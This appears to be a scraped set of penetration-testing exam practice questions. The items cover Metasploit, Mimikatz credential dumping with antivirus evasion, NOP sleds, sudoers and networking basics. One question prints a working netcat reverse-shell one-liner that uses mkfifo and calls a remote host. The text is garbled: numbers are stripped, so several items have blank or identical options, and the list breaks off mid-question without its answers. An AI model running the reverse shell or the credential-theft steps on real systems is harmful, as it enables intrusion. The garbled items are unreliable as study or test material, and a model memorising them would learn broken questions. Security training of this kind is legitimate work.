Table of Contents
Practice Exams
Practice Exam
Practice Exam
Practice Exam
Practice Exam
Practice Exam
Practice Exam
Practice Exam
Practice Exam
Practice Exam
Practice Exam
Answers to Practice Exams
Practice Exam
Practice Exam
Practice Exam
Practice Exam
Practice Exam
Practice Exam
Practice Exam
Practice Exam
Practice Exam
Practice Exam
Practice Exam
What is the difference between a stager and a stage in regard to a Metasploit payload? (Select the best answer.)
A. A stager executes the logic behind the payload, but the stage contains all the necessary functionality to exploit the target and communicate with the MSF.
B. A stager is responsible for loading and communicating with the stage, and the stage carries the particular function of the payload.
C. A stager has all the functionality necessary to deliver the exploit to the stage, and the stage is responsible for communicating with the payload.
D. A stager is a stand-alone payload, and a stage is responsible for communicating with each stager of a payload.
Which processor instruction is commonly used to fill up buffer space in exploit code and help slide the program execution flow to its final destination?
A. 0x80
B. 0x99
C. 0x90
D. 0x09
In Empire, Persistence, Privilege Escalation, and Situational Awareness are three types of which of the following?
A. Payload categories
B. Module categories
C. Listener categories
D. Stager categories
Which of the following entries in /etc/sudoers would give users in the administrators group the ability to run the /bin/bar command as root without requiring a password?
A. #admins ALL=(wheel) NOPASSWD:ALL
B. #ALL (admins) NOPASSWD:/bin/bar@asroot
C. %admins ALL=(root) NOPASSWD: /bin/bar
D. root ALL=(admins) /bin/bar: NOPASSWD
While conducting a pentest, your team successfully compromises local administrator privileges on a Windows Server 2008 file server. You closely evaluate the compromised server and discover that an antivirus
tool is configured to scan the filesystem for malicious code. Which of the following could help you extract credentials from the target and help evade detection from the antivirus tool? (Select all that apply.)
A. Load the kiwi module in Metasploit and run Mimikatz in memory
B. Copy the mimikatz.exe executable over to the targets C:\Windows\Temp folder and execute Mimikatz from the target hard drive
C. Remote copy the SAM, Security, and System hives from HKLM in the targets Windows registry to your attack host and crack the hashes offline
D. Use the hashdump Metasploit module to recover hashes from the targets Windows registry
When executing Mimikatz from the targets hard drive, which of the following commands must you execute, which requires you to impersonate SYSTEM-level access, prior to dumping credentials from the target host?
A. mimikatz # privilege::debug
B. mimikatz # token::whoami
C. mimikatz # token::elevate
D. mimikatz # lsadump::sam
Which two commands can you use on a Windows system to list known Layer addresses?
A. arp --all-neighbors
B. arp -a
C. Get-NetNeighbor
D. Get-ArpNeighbor
After gaining access to a Linux system, you determine that services are configured with systemd to run in graphical mode. Under which directory can you look for these services?
A. /proc/systemd/running
B. /var/lib/graphical.target.wants
C. /etc/system.d/graphical.wants
D. /etc/systemd/system/graphical.target.wants
Given the following command, what is the purpose of mkfifo
rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -I 2>&1|nc $RHOST $RPORT >/tmp/f
A. Connect to the network socket
B. Create a new named pipe called /tmp/f
C. Read from the named pipe called /tmp/f
D. Create a file named /tmp/f
You want to start capturing a target users clipboard activity on a Windows target. Which Metasploit extension will you need to load inside your meterpreter session in order to make use of the clipboard commands?
A. load kiwi
B. load clipboard
C. load extapi
D. load clipbrd
Which of the following protocols can offer a secure transport mechanism for delivering the report to the customer? (Select all that apply.)
A. HTTP
B. SFTP
C. FTP
D. HTTPS
A reverse WWW shell connects to which port on a hackers system?
A.
B.
C.
D.
What is the command used to install and run Snort?
A. snort l c:\snort\log c C:\snort\etc\snort.conf A console
B. snort c C:\snort\etc\snort.conf A console
C. snort c C:\snort\etc\snort.conf console
D. snort l c:\snort\log c A
What is cryptography?
A. The study of computer science
B. The study of mathematics
C. The study of encryption
D. The creation of encryption algorithms
What is the process of changing the order of some characters in an encryption key?
A. Transposition
B. Subtraction
C. Substitution
D. Transrelation
Which tools are not essential in a pen testers toolbox?
A. Password crackers
B. Port scanning tools
C. Vulnerability scanning tools
D. Web testing tools
E. Database assessment tools
F. None of the above
What are not the results to be expected from a preattack passive reconnaissance phase? (Choose all that apply.)
A. Directory mapping
B. Competitive intelligence gathering
C. Asset classification
D. Acquiring the target
E. Product/service offerings
F. Executing, implanting, and retracting
G. Social engineering
Which design concept limits access to systems from outside users while protecting users and systems inside the LAN?
A. DMZ
B. VLAN
C. I&A
D. Router
In the key recovery process, which key must be recoverable?
A. Rollover key
B. Secret key
C. Previous key
D. Escrow key
Which of the following is the purpose of the footprinting process?
A. Entering a system
B. Covering tracks
C. Escalating privileges
D. Gathering information
Which of the following forms are usually malicious?
A. Software applications
B. Scripts
C. Viruses
D. Grayware
Hubs operate at what layer of the OSI model?
A. Layer
B. Layer
C. Layer
D. Layer
What is the proper sequence of the TCP three-way-handshake?
A. SYN-ACK, ACK, ACK
B. SYN, SYN-ACK, ACK
C. SYN-SYN, SYN-ACK, SYN
D. ACK, SYN-ACK, SYN
A public key is stored on the local computer by its owner in a ____________________.
A. Hash
B. PKI system
